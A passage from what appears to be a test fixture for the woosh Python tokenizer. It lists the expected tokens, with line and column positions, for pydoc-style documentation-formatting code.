woosh.Token(woosh.OP, '[', 1410, 16, 1410, 17),
woosh.Token(woosh.OP, '(', 1410, 17, 1410, 18),
woosh.Token(woosh.NAME, 'name', 1410, 18, 1410, 22),
woosh.Token(woosh.OP, ',', 1410, 22, 1410, 23),
woosh.Token(woosh.NAME, 'kind', 1410, 24, 1410, 28),
woosh.Token(woosh.OP, ',', 1410, 28, 1410, 29),
woosh.Token(woosh.NAME, 'cls', 1410, 30, 1410, 33),
woosh.Token(woosh.OP, ',', 1410, 33, 1410, 34),
woosh.Token(woosh.NAME, 'value', 1410, 35, 1410, 40),
woosh.Token(woosh.OP, ')', 1410, 40, 1410, 41),
woosh.Token(woosh.NAME, 'for', 1411, 17, 1411, 20),
woosh.Token(woosh.NAME, 'name', 1411, 21, 1411, 25),
woosh.Token(woosh.OP, ',', 1411, 25, 1411, 26),
woosh.Token(woosh.NAME, 'kind', 1411, 27, 1411, 31),
woosh.Token(woosh.OP, ',', 1411, 31, 1411, 32),
woosh.Token(woosh.NAME, 'cls', 1411, 33, 1411, 36),
woosh.Token(woosh.OP, ',', 1411, 36, 1411, 37),
woosh.Token(woosh.NAME, 'value', 1411, 38, 1411, 43),
woosh.Token(woosh.NAME, 'in', 1411, 44, 1411, 46),
woosh.Token(woosh.NAME, 'classify_class_attrs', 1411, 47, 1411, 67),
woosh.Token(woosh.OP, '(', 1411, 67, 1411, 68),
woosh.Token(woosh.NAME, 'object', 1411, 68, 1411, 74),
woosh.Token(woosh.OP, ')', 1411, 74, 1411, 75),
woosh.Token(woosh.NAME, 'if', 1412, 17, 1412, 19),
woosh.Token(woosh.NAME, 'visiblename', 1412, 20, 1412, 31),
woosh.Token(woosh.OP, '(', 1412, 31, 1412, 32),
woosh.Token(woosh.NAME, 'name', 1412, 32, 1412, 36),
woosh.Token(woosh.OP, ',', 1412, 36, 1412, 37),
woosh.Token(woosh.NAME, 'obj', 1412, 38, 1412, 41),
woosh.Token(woosh.OP, '=', 1412, 41, 1412, 42),
woosh.Token(woosh.NAME, 'object', 1412, 42, 1412, 48),
woosh.Token(woosh.OP, ')', 1412, 48, 1412, 49),
woosh.Token(woosh.OP, ']', 1412, 49, 1412, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 1412, 50, 1413, 0),
woosh.Token(woosh.NAME, 'while', 1414, 8, 1414, 13),
woosh.Token(woosh.NAME, 'attrs', 1414, 14, 1414, 19),
woosh.Token(woosh.OP, ':', 1414, 19, 1414, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1414, 20, 1415, 0),
woosh.Token(woosh.INDENT, ' ', 1415, 0, 1415, 12),
woosh.Token(woosh.NAME, 'if', 1415, 12, 1415, 14),
woosh.Token(woosh.NAME, 'mro', 1415, 15, 1415, 18),
woosh.Token(woosh.OP, ':', 1415, 18, 1415, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 1415, 19, 1416, 0),
woosh.Token(woosh.INDENT, ' ', 1416, 0, 1416, 16),
woosh.Token(woosh.NAME, 'thisclass', 1416, 16, 1416, 25),
woosh.Token(woosh.OP, '=', 1416, 26, 1416, 27),
woosh.Token(woosh.NAME, 'mro', 1416, 28, 1416, 31),
woosh.Token(woosh.OP, '.', 1416, 31, 1416, 32),
woosh.Token(woosh.NAME, 'popleft', 1416, 32, 1416, 39),
woosh.Token(woosh.OP, '(', 1416, 39, 1416, 40),
woosh.Token(woosh.OP, ')', 1416, 40, 1416, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1416, 41, 1417, 0),
woosh.Token(woosh.DEDENT, ' ', 1417, 0, 1417, 12),
woosh.Token(woosh.NAME, 'else', 1417, 12, 1417, 16),
woosh.Token(woosh.OP, ':', 1417, 16, 1417, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1417, 17, 1418, 0),
woosh.Token(woosh.INDENT, ' ', 1418, 0, 1418, 16),
woosh.Token(woosh.NAME, 'thisclass', 1418, 16, 1418, 25),
woosh.Token(woosh.OP, '=', 1418, 26, 1418, 27),
woosh.Token(woosh.NAME, 'attrs', 1418, 28, 1418, 33),
woosh.Token(woosh.OP, '[', 1418, 33, 1418, 34),
woosh.Token(woosh.NUMBER, '0', 1418, 34, 1418, 35),
woosh.Token(woosh.OP, ']', 1418, 35, 1418, 36),
woosh.Token(woosh.OP, '[', 1418, 36, 1418, 37),
woosh.Token(woosh.NUMBER, '2', 1418, 37, 1418, 38),
woosh.Token(woosh.OP, ']', 1418, 38, 1418, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1418, 39, 1419, 0),
woosh.Token(woosh.DEDENT, ' ', 1419, 0, 1419, 12),
woosh.Token(woosh.NAME, 'attrs', 1419, 12, 1419, 17),
woosh.Token(woosh.OP, ',', 1419, 17, 1419, 18),
woosh.Token(woosh.NAME, 'inherited', 1419, 19, 1419, 28),
woosh.Token(woosh.OP, '=', 1419, 29, 1419, 30),
woosh.Token(woosh.NAME, '_split_list', 1419, 31, 1419, 42),
woosh.Token(woosh.OP, '(', 1419, 42, 1419, 43),
woosh.Token(woosh.NAME, 'attrs', 1419, 43, 1419, 48),
woosh.Token(woosh.OP, ',', 1419, 48, 1419, 49),
woosh.Token(woosh.NAME, 'lambda', 1419, 50, 1419, 56),
woosh.Token(woosh.NAME, 't', 1419, 57, 1419, 58),
woosh.Token(woosh.OP, ':', 1419, 58, 1419, 59),
woosh.Token(woosh.NAME, 't', 1419, 60, 1419, 61),
woosh.Token(woosh.OP, '[', 1419, 61, 1419, 62),
woosh.Token(woosh.NUMBER, '2', 1419, 62, 1419, 63),
woosh.Token(woosh.OP, ']', 1419, 63, 1419, 64),
woosh.Token(woosh.NAME, 'is', 1419, 65, 1419, 67),
woosh.Token(woosh.NAME, 'thisclass', 1419, 68, 1419, 77),
woosh.Token(woosh.OP, ')', 1419, 77, 1419, 78),
woosh.Token(woosh.NEWLINE, '\r\n', 1419, 78, 1420, 0),
woosh.Token(woosh.NAME, 'if', 1421, 12, 1421, 14),
woosh.Token(woosh.NAME, 'object', 1421, 15, 1421, 21),
woosh.Token(woosh.NAME, 'is', 1421, 22, 1421, 24),
woosh.Token(woosh.NAME, 'not', 1421, 25, 1421, 28),
woosh.Token(woosh.NAME, 'builtins', 1421, 29, 1421, 37),
woosh.Token(woosh.OP, '.', 1421, 37, 1421, 38),
woosh.Token(woosh.NAME, 'object', 1421, 38, 1421, 44),
woosh.Token(woosh.NAME, 'and', 1421, 45, 1421, 48),
woosh.Token(woosh.NAME, 'thisclass', 1421, 49, 1421, 58),
woosh.Token(woosh.NAME, 'is', 1421, 59, 1421, 61),
woosh.Token(woosh.NAME, 'builtins', 1421, 62, 1421, 70),
woosh.Token(woosh.OP, '.', 1421, 70, 1421, 71),
woosh.Token(woosh.NAME, 'object', 1421, 71, 1421, 77),
woosh.Token(woosh.OP, ':', 1421, 77, 1421, 78),
woosh.Token(woosh.NEWLINE, '\r\n', 1421, 78, 1422, 0),
woosh.Token(woosh.INDENT, ' ', 1422, 0, 1422, 16),
woosh.Token(woosh.NAME, 'attrs', 1422, 16, 1422, 21),
woosh.Token(woosh.OP, '=', 1422, 22, 1422, 23),
woosh.Token(woosh.NAME, 'inherited', 1422, 24, 1422, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 1422, 33, 1423, 0),
woosh.Token(woosh.NAME, 'continue', 1423, 16, 1423, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 1423, 24, 1424, 0),
woosh.Token(woosh.DEDENT, ' ', 1424, 0, 1424, 12),
woosh.Token(woosh.NAME, 'elif', 1424, 12, 1424, 16),
woosh.Token(woosh.NAME, 'thisclass', 1424, 17, 1424, 26),
woosh.Token(woosh.NAME, 'is', 1424, 27, 1424, 29),
woosh.Token(woosh.NAME, 'object', 1424, 30, 1424, 36),
woosh.Token(woosh.OP, ':', 1424, 36, 1424, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 1424, 37, 1425, 0),
woosh.Token(woosh.INDENT, ' ', 1425, 0, 1425, 16),
woosh.Token(woosh.NAME, 'tag', 1425, 16, 1425, 19),
woosh.Token(woosh.OP, '=', 1425, 20, 1425, 21),
woosh.Token(woosh.STRING, '"defined here"', 1425, 22, 1425, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 1425, 36, 1426, 0),
woosh.Token(woosh.DEDENT, ' ', 1426, 0, 1426, 12),
woosh.Token(woosh.NAME, 'else', 1426, 12, 1426, 16),
woosh.Token(woosh.OP, ':', 1426, 16, 1426, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1426, 17, 1427, 0),
woosh.Token(woosh.INDENT, ' ', 1427, 0, 1427, 16),
woosh.Token(woosh.NAME, 'tag', 1427, 16, 1427, 19),
woosh.Token(woosh.OP, '=', 1427, 20, 1427, 21),
woosh.Token(woosh.STRING, '"inherited from %s"', 1427, 22, 1427, 41),
woosh.Token(woosh.OP, '%', 1427, 42, 1427, 43),
woosh.Token(woosh.NAME, 'classname', 1427, 44, 1427, 53),
woosh.Token(woosh.OP, '(', 1427, 53, 1427, 54),
woosh.Token(woosh.NAME, 'thisclass', 1427, 54, 1427, 63),
woosh.Token(woosh.OP, ',', 1427, 63, 1427, 64),
woosh.Token(woosh.NAME, 'object', 1428, 54, 1428, 60),
woosh.Token(woosh.OP, '.', 1428, 60, 1428, 61),
woosh.Token(woosh.NAME, '__module__', 1428, 61, 1428, 71),
woosh.Token(woosh.OP, ')', 1428, 71, 1428, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 1428, 72, 1429, 0),
woosh.Token(woosh.DEDENT, ' ', 1430, 0, 1430, 12),
woosh.Token(woosh.NAME, 'sort_attributes', 1430, 12, 1430, 27),
woosh.Token(woosh.OP, '(', 1430, 27, 1430, 28),
woosh.Token(woosh.NAME, 'attrs', 1430, 28, 1430, 33),
woosh.Token(woosh.OP, ',', 1430, 33, 1430, 34),
woosh.Token(woosh.NAME, 'object', 1430, 35, 1430, 41),
woosh.Token(woosh.OP, ')', 1430, 41, 1430, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1430, 42, 1431, 0),
woosh.Token(woosh.COMMENT, '# Pump out the attrs, segregated by kind.', 1432, 12, 1432, 53),
woosh.Token(woosh.NAME, 'attrs', 1433, 12, 1433, 17),
woosh.Token(woosh.OP, '=', 1433, 18, 1433, 19),
woosh.Token(woosh.NAME, 'spill', 1433, 20, 1433, 25),
woosh.Token(woosh.OP, '(', 1433, 25, 1433, 26),
woosh.Token(woosh.STRING, '"Methods %s:\\n"', 1433, 26, 1433, 41),
woosh.Token(woosh.OP, '%', 1433, 42, 1433, 43),
woosh.Token(woosh.NAME, 'tag', 1433, 44, 1433, 47),
woosh.Token(woosh.OP, ',', 1433, 47, 1433, 48),
woosh.Token(woosh.NAME, 'attrs', 1433, 49, 1433, 54),
woosh.Token(woosh.OP, ',', 1433, 54, 1433, 55),
woosh.Token(woosh.NAME, 'lambda', 1434, 26, 1434, 32),
woosh.Token(woosh.NAME, 't', 1434, 33, 1434, 34),
woosh.Token(woosh.OP, ':', 1434, 34, 1434, 35),
woosh.Token(woosh.NAME, 't', 1434, 36, 1434, 37),
woosh.Token(woosh.OP, '[', 1434, 37, 1434, 38),
woosh.Token(woosh.NUMBER, '1', 1434, 38, 1434, 39),
woosh.Token(woosh.OP, ']', 1434, 39, 1434, 40),
woosh.Token(woosh.OP, '==', 1434, 41, 1434, 43),
woosh.Token(woosh.STRING, "'method'", 1434, 44, 1434, 52),
woosh.Token(woosh.OP, ')', 1434, 52, 1434, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1434, 53, 1435, 0),
woosh.Token(woosh.NAME, 'attrs', 1435, 12, 1435, 17),
woosh.Token(woosh.OP, '=', 1435, 18, 1435, 19),
woosh.Token(woosh.NAME, 'spill', 1435, 20, 1435, 25),
woosh.Token(woosh.OP, '(', 1435, 25, 1435, 26),
woosh.Token(woosh.STRING, '"Class methods %s:\\n"', 1435, 26, 1435, 47),
woosh.Token(woosh.OP, '%', 1435, 48, 1435, 49),
woosh.Token(woosh.NAME, 'tag', 1435, 50, 1435, 53),
woosh.Token(woosh.OP, ',', 1435, 53, 1435, 54),
woosh.Token(woosh.NAME, 'attrs', 1435, 55, 1435, 60),
woosh.Token(woosh.OP, ',', 1435, 60, 1435, 61),
woosh.Token(woosh.NAME, 'lambda', 1436, 26, 1436, 32),
woosh.Token(woosh.NAME, 't', 1436, 33, 1436, 34),
woosh.Token(woosh.OP, ':', 1436, 34, 1436, 35),
woosh.Token(woosh.NAME, 't', 1436, 36, 1436, 37),
woosh.Token(woosh.OP, '[', 1436, 37, 1436, 38),
woosh.Token(woosh.NUMBER, '1', 1436, 38, 1436, 39),
woosh.Token(woosh.OP, ']', 1436, 39, 1436, 40),
woosh.Token(woosh.OP, '==', 1436, 41, 1436, 43),
woosh.Token(woosh.STRING, "'class method'", 1436, 44, 1436, 58),
woosh.Token(woosh.OP, ')', 1436, 58, 1436, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 1436, 59, 1437, 0),
woosh.Token(woosh.NAME, 'attrs', 1437, 12, 1437, 17),
woosh.Token(woosh.OP, '=', 1437, 18, 1437, 19),
woosh.Token(woosh.NAME, 'spill', 1437, 20, 1437, 25),
woosh.Token(woosh.OP, '(', 1437, 25, 1437, 26),
woosh.Token(woosh.STRING, '"Static methods %s:\\n"', 1437, 26, 1437, 48),
woosh.Token(woosh.OP, '%', 1437, 49, 1437, 50),
woosh.Token(woosh.NAME, 'tag', 1437, 51, 1437, 54),
woosh.Token(woosh.OP, ',', 1437, 54, 1437, 55),
woosh.Token(woosh.NAME, 'attrs', 1437, 56, 1437, 61),
woosh.Token(woosh.OP, ',', 1437, 61, 1437, 62),
woosh.Token(woosh.NAME, 'lambda', 1438, 26, 1438, 32),
woosh.Token(woosh.NAME, 't', 1438, 33, 1438, 34),
woosh.Token(woosh.OP, ':', 1438, 34, 1438, 35),
woosh.Token(woosh.NAME, 't', 1438, 36, 1438, 37),
woosh.Token(woosh.OP, '[', 1438, 37, 1438, 38),
woosh.Token(woosh.NUMBER, '1', 1438, 38, 1438, 39),
woosh.Token(woosh.OP, ']', 1438, 39, 1438, 40),
woosh.Token(woosh.OP, '==', 1438, 41, 1438, 43),
woosh.Token(woosh.STRING, "'static method'", 1438, 44, 1438, 59),
woosh.Token(woosh.OP, ')', 1438, 59, 1438, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 1438, 60, 1439, 0),
woosh.Token(woosh.NAME, 'attrs', 1439, 12, 1439, 17),
woosh.Token(woosh.OP, '=', 1439, 18, 1439, 19),
woosh.Token(woosh.NAME, 'spilldescriptors', 1439, 20, 1439, 36),
woosh.Token(woosh.OP, '(', 1439, 36, 1439, 37),
woosh.Token(woosh.STRING, '"Readonly properties %s:\\n"', 1439, 37, 1439, 64),
woosh.Token(woosh.OP, '%', 1439, 65, 1439, 66),
woosh.Token(woosh.NAME, 'tag', 1439, 67, 1439, 70),
woosh.Token(woosh.OP, ',', 1439, 70, 1439, 71),
woosh.Token(woosh.NAME, 'attrs', 1439, 72, 1439, 77),
woosh.Token(woosh.OP, ',', 1439, 77, 1439, 78),
woosh.Token(woosh.NAME, 'lambda', 1440, 37, 1440, 43),
woosh.Token(woosh.NAME, 't', 1440, 44, 1440, 45),
woosh.Token(woosh.OP, ':', 1440, 45, 1440, 46),
woosh.Token(woosh.NAME, 't', 1440, 47, 1440, 48),
woosh.Token(woosh.OP, '[', 1440, 48, 1440, 49),
woosh.Token(woosh.NUMBER, '1', 1440, 49, 1440, 50),
woosh.Token(woosh.OP, ']', 1440, 50, 1440, 51),
woosh.Token(woosh.OP, '==', 1440, 52, 1440, 54),
woosh.Token(woosh.STRING, "'readonly property'", 1440, 55, 1440, 74),
woosh.Token(woosh.OP, ')', 1440, 74, 1440, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 1440, 75, 1441, 0),
woosh.Token(woosh.NAME, 'attrs', 1441, 12, 1441, 17),
woosh.Token(woosh.OP, '=', 1441, 18, 1441, 19),
woosh.Token(woosh.NAME, 'spilldescriptors', 1441, 20, 1441, 36),
woosh.Token(woosh.OP, '(', 1441, 36, 1441, 37),
woosh.Token(woosh.STRING, '"Data descriptors %s:\\n"', 1441, 37, 1441, 61),
woosh.Token(woosh.OP, '%', 1441, 62, 1441, 63),
woosh.Token(woosh.NAME, 'tag', 1441, 64, 1441, 67),
woosh.Token(woosh.OP, ',', 1441, 67, 1441, 68),
woosh.Token(woosh.NAME, 'attrs', 1441, 69, 1441, 74),
woosh.Token(woosh.OP, ',', 1441, 74, 1441, 75),
woosh.Token(woosh.NAME, 'lambda', 1442, 37, 1442, 43),
woosh.Token(woosh.NAME, 't', 1442, 44, 1442, 45),
woosh.Token(woosh.OP, ':', 1442, 45, 1442, 46),
woosh.Token(woosh.NAME, 't', 1442, 47, 1442, 48),
woosh.Token(woosh.OP, '[', 1442, 48, 1442, 49),
woosh.Token(woosh.NUMBER, '1', 1442, 49, 1442, 50),
woosh.Token(woosh.OP, ']', 1442, 50, 1442, 51),
woosh.Token(woosh.OP, '==', 1442, 52, 1442, 54),
woosh.Token(woosh.STRING, "'data descriptor'", 1442, 55, 1442, 72),
woosh.Token(woosh.OP, ')', 1442, 72, 1442, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 1442, 73, 1443, 0),
woosh.Token(woosh.NAME, 'attrs', 1443, 12, 1443, 17),
woosh.Token(woosh.OP, '=', 1443, 18, 1443, 19),
woosh.Token(woosh.NAME, 'spilldata', 1443, 20, 1443, 29),
woosh.Token(woosh.OP, '(', 1443, 29, 1443, 30),
woosh.Token(woosh.STRING, '"Data and other attributes %s:\\n"', 1443, 30, 1443, 63),
woosh.Token(woosh.OP, '%', 1443, 64, 1443, 65),
woosh.Token(woosh.NAME, 'tag', 1443, 66, 1443, 69),
woosh.Token(woosh.OP, ',', 1443, 69, 1443, 70),
woosh.Token(woosh.NAME, 'attrs', 1443, 71, 1443, 76),
woosh.Token(woosh.OP, ',', 1443, 76, 1443, 77),
woosh.Token(woosh.NAME, 'lambda', 1444, 30, 1444, 36),
woosh.Token(woosh.NAME, 't', 1444, 37, 1444, 38),
woosh.Token(woosh.OP, ':', 1444, 38, 1444, 39),
woosh.Token(woosh.NAME, 't', 1444, 40, 1444, 41),
woosh.Token(woosh.OP, '[', 1444, 41, 1444, 42),
woosh.Token(woosh.NUMBER, '1', 1444, 42, 1444, 43),
woosh.Token(woosh.OP, ']', 1444, 43, 1444, 44),
woosh.Token(woosh.OP, '==', 1444, 45, 1444, 47),
woosh.Token(woosh.STRING, "'data'", 1444, 48, 1444, 54),
woosh.Token(woosh.OP, ')', 1444, 54, 1444, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1444, 55, 1445, 0),
woosh.Token(woosh.NAME, 'assert', 1446, 12, 1446, 18),
woosh.Token(woosh.NAME, 'attrs', 1446, 19, 1446, 24),
woosh.Token(woosh.OP, '==', 1446, 25, 1446, 27),
woosh.Token(woosh.OP, '[', 1446, 28, 1446, 29),
woosh.Token(woosh.OP, ']', 1446, 29, 1446, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1446, 30, 1447, 0),
woosh.Token(woosh.NAME, 'attrs', 1447, 12, 1447, 17),
woosh.Token(woosh.OP, '=', 1447, 18, 1447, 19),
woosh.Token(woosh.NAME, 'inherited', 1447, 20, 1447, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1447, 29, 1448, 0),
woosh.Token(woosh.DEDENT, ' ', 1449, 0, 1449, 8),
woosh.Token(woosh.NAME, 'contents', 1449, 8, 1449, 16),
woosh.Token(woosh.OP, '=', 1449, 17, 1449, 18),
woosh.Token(woosh.STRING, "'\\n'", 1449, 19, 1449, 23),
woosh.Token(woosh.OP, '.', 1449, 23, 1449, 24),
woosh.Token(woosh.NAME, 'join', 1449, 24, 1449, 28),
woosh.Token(woosh.OP, '(', 1449, 28, 1449, 29),
woosh.Token(woosh.NAME, 'contents', 1449, 29, 1449, 37),
woosh.Token(woosh.OP, ')', 1449, 37, 1449, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 1449, 38, 1450, 0),
woosh.Token(woosh.NAME, 'if', 1450, 8, 1450, 10),
woosh.Token(woosh.NAME, 'not', 1450, 11, 1450, 14),
woosh.Token(woosh.NAME, 'contents', 1450, 15, 1450, 23),
woosh.Token(woosh.OP, ':', 1450, 23, 1450, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 1450, 24, 1451, 0),
woosh.Token(woosh.INDENT, ' ', 1451, 0, 1451, 12),
woosh.Token(woosh.NAME, 'return', 1451, 12, 1451, 18),
woosh.Token(woosh.NAME, 'title', 1451, 19, 1451, 24),
woosh.Token(woosh.OP, '+', 1451, 25, 1451, 26),
woosh.Token(woosh.STRING, "'\\n'", 1451, 27, 1451, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1451, 31, 1452, 0),
woosh.Token(woosh.DEDENT, ' ', 1452, 0, 1452, 8),
woosh.Token(woosh.NAME, 'return', 1452, 8, 1452, 14),
woosh.Token(woosh.NAME, 'title', 1452, 15, 1452, 20),
woosh.Token(woosh.OP, '+', 1452, 21, 1452, 22),
woosh.Token(woosh.STRING, "'\\n'", 1452, 23, 1452, 27),
woosh.Token(woosh.OP, '+', 1452, 28, 1452, 29),
woosh.Token(woosh.NAME, 'self', 1452, 30, 1452, 34),
woosh.Token(woosh.OP, '.', 1452, 34, 1452, 35),
woosh.Token(woosh.NAME, 'indent', 1452, 35, 1452, 41),
woosh.Token(woosh.OP, '(', 1452, 41, 1452, 42),
woosh.Token(woosh.NAME, 'contents', 1452, 42, 1452, 50),
woosh.Token(woosh.OP, '.', 1452, 50, 1452, 51),
woosh.Token(woosh.NAME, 'rstrip', 1452, 51, 1452, 57),
woosh.Token(woosh.OP, '(', 1452, 57, 1452, 58),
woosh.Token(woosh.OP, ')', 1452, 58, 1452, 59),
woosh.Token(woosh.OP, ',', 1452, 59, 1452, 60),
woosh.Token(woosh.STRING, "' | '", 1452, 61, 1452, 67),
woosh.Token(woosh.OP, ')', 1452, 67, 1452, 68),
woosh.Token(woosh.OP, '+', 1452, 69, 1452, 70),
woosh.Token(woosh.STRING, "'\\n'", 1452, 71, 1452, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 1452, 75, 1453, 0),
woosh.Token(woosh.DEDENT, ' ', 1454, 0, 1454, 4),
woosh.Token(woosh.NAME, 'def', 1454, 4, 1454, 7),
woosh.Token(woosh.NAME, 'formatvalue', 1454, 8, 1454, 19),
woosh.Token(woosh.OP, '(', 1454, 19, 1454, 20),
woosh.Token(woosh.NAME, 'self', 1454, 20, 1454, 24),
woosh.Token(woosh.OP, ',', 1454, 24, 1454, 25),
woosh.Token(woosh.NAME, 'object', 1454, 26, 1454, 32),
woosh.Token(woosh.OP, ')', 1454, 32, 1454, 33),
woosh.Token(woosh.OP, ':', 1454, 33, 1454, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 1454, 34, 1455, 0),
woosh.Token(woosh.INDENT, ' ', 1455, 0, 1455, 8),
woosh.Token(woosh.STRING, '"""Format an argument default value as text."""', 1455, 8, 1455, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1455, 55, 1456, 0),
woosh.Token(woosh.NAME, 'return', 1456, 8, 1456, 14),
woosh.Token(woosh.STRING, "'='", 1456, 15, 1456, 18),
woosh.Token(woosh.OP, '+', 1456, 19, 1456, 20),
woosh.Token(woosh.NAME, 'self', 1456, 21, 1456, 25),
woosh.Token(woosh.OP, '.', 1456, 25, 1456, 26),
woosh.Token(woosh.NAME, 'repr', 1456, 26, 1456, 30),
woosh.Token(woosh.OP, '(', 1456, 30, 1456, 31),
woosh.Token(woosh.NAME, 'object', 1456, 31, 1456, 37),
woosh.Token(woosh.OP, ')', 1456, 37, 1456, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 1456, 38, 1457, 0),
woosh.Token(woosh.DEDENT, ' ', 1458, 0, 1458, 4),
woosh.Token(woosh.NAME, 'def', 1458, 4, 1458, 7),
woosh.Token(woosh.NAME, 'docroutine', 1458, 8, 1458, 18),
woosh.Token(woosh.OP, '(', 1458, 18, 1458, 19),
woosh.Token(woosh.NAME, 'self', 1458, 19, 1458, 23),
woosh.Token(woosh.OP, ',', 1458, 23, 1458, 24),
woosh.Token(woosh.NAME, 'object', 1458, 25, 1458, 31),
woosh.Token(woosh.OP, ',', 1458, 31, 1458, 32),
woosh.Token(woosh.NAME, 'name', 1458, 33, 1458, 37),
woosh.Token(woosh.OP, '=', 1458, 37, 1458, 38),
woosh.Token(woosh.NAME, 'None', 1458, 38, 1458, 42),
woosh.Token(woosh.OP, ',', 1458, 42, 1458, 43),
woosh.Token(woosh.NAME, 'mod', 1458, 44, 1458, 47),
woosh.Token(woosh.OP, '=', 1458, 47, 1458, 48),
woosh.Token(woosh.NAME, 'None', 1458, 48, 1458, 52),
woosh.Token(woosh.OP, ',', 1458, 52, 1458, 53),
woosh.Token(woosh.NAME, 'cl', 1458, 54, 1458, 56),
woosh.Token(woosh.OP, '=', 1458, 56, 1458, 57),
woosh.Token(woosh.NAME, 'None', 1458, 57, 1458, 61),
woosh.Token(woosh.OP, ')', 1458, 61, 1458, 62),
woosh.Token(woosh.OP, ':', 1458, 62, 1458, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 1458, 63, 1459, 0),
woosh.Token(woosh.INDENT, ' ', 1459, 0, 1459, 8),
woosh.Token(woosh.STRING, '"""Produce text documentation for a function or method object."""', 1459, 8, 1459, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 1459, 73, 1460, 0),
woosh.Token(woosh.NAME, 'realname', 1460, 8, 1460, 16),
woosh.Token(woosh.OP, '=', 1460, 17, 1460, 18),
woosh.Token(woosh.NAME, 'object', 1460, 19, 1460, 25),
woosh.Token(woosh.OP, '.', 1460, 25, 1460, 26),
woosh.Token(woosh.NAME, '__name__', 1460, 26, 1460, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 1460, 34, 1461, 0),
woosh.Token(woosh.NAME, 'name', 1461, 8, 1461, 12),
woosh.Token(woosh.OP, '=', 1461, 13, 1461, 14),
woosh.Token(woosh.NAME, 'name', 1461, 15, 1461, 19),
woosh.Token(woosh.NAME, 'or', 1461, 20, 1461, 22),
woosh.Token(woosh.NAME, 'realname', 1461, 23, 1461, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1461, 31, 1462, 0),
woosh.Token(woosh.NAME, 'note', 1462, 8, 1462, 12),
woosh.Token(woosh.OP, '=', 1462, 13, 1462, 14),
woosh.Token(woosh.STRING, "''", 1462, 15, 1462, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1462, 17, 1463, 0),
woosh.Token(woosh.NAME, 'skipdocs', 1463, 8, 1463, 16),
woosh.Token(woosh.OP, '=', 1463, 17, 1463, 18),
woosh.Token(woosh.NUMBER, '0', 1463, 19, 1463, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1463, 20, 1464, 0),
woosh.Token(woosh.NAME, 'if', 1464, 8, 1464, 10),
woosh.Token(woosh.NAME, '_is_bound_method', 1464, 11, 1464, 27),
woosh.Token(woosh.OP, '(', 1464, 27, 1464, 28),
woosh.Token(woosh.NAME, 'object', 1464, 28, 1464, 34),
woosh.Token(woosh.OP, ')', 1464, 34, 1464, 35),
woosh.Token(woosh.OP, ':', 1464, 35, 1464, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 1464, 36, 1465, 0),
woosh.Token(woosh.INDENT, ' ', 1465, 0, 1465, 12),
woosh.Token(woosh.NAME, 'imclass', 1465, 12, 1465, 19),
woosh.Token(woosh.OP, '=', 1465, 20, 1465, 21),
woosh.Token(woosh.NAME, 'object', 1465, 22, 1465, 28),
woosh.Token(woosh.OP, '.', 1465, 28, 1465, 29),
woosh.Token(woosh.NAME, '__self__', 1465, 29, 1465, 37),
woosh.Token(woosh.OP, '.', 1465, 37, 1465, 38),
woosh.Token(woosh.NAME, '__class__', 1465, 38, 1465, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 1465, 47, 1466, 0),
woosh.Token(woosh.NAME, 'if', 1466, 12, 1466, 14),
woosh.Token(woosh.NAME, 'cl', 1466, 15, 1466, 17),
woosh.Token(woosh.OP, ':', 1466, 17, 1466, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 1466, 18, 1467, 0),
woosh.Token(woosh.INDENT, ' ', 1467, 0, 1467, 16),
woosh.Token(woosh.NAME, 'if', 1467, 16, 1467, 18),
woosh.Token(woosh.NAME, 'imclass', 1467, 19, 1467, 26),
woosh.Token(woosh.NAME, 'is', 1467, 27, 1467, 29),
woosh.Token(woosh.NAME, 'not', 1467, 30, 1467, 33),
woosh.Token(woosh.NAME, 'cl', 1467, 34, 1467, 36),
woosh.Token(woosh.OP, ':', 1467, 36, 1467, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 1467, 37, 1468, 0),
woosh.Token(woosh.INDENT, ' ', 1468, 0, 1468, 20),
woosh.Token(woosh.NAME, 'note', 1468, 20, 1468, 24),
woosh.Token(woosh.OP, '=', 1468, 25, 1468, 26),
woosh.Token(woosh.STRING, "' from '", 1468, 27, 1468, 35),
woosh.Token(woosh.OP, '+', 1468, 36, 1468, 37),
woosh.Token(woosh.NAME, 'classname', 1468, 38, 1468, 47),
woosh.Token(woosh.OP, '(', 1468, 47, 1468, 48),
woosh.Token(woosh.NAME, 'imclass', 1468, 48, 1468, 55),
woosh.Token(woosh.OP, ',', 1468, 55, 1468, 56),
woosh.Token(woosh.NAME, 'mod', 1468, 57, 1468, 60),
woosh.Token(woosh.OP, ')', 1468, 60, 1468, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 1468, 61, 1469, 0),
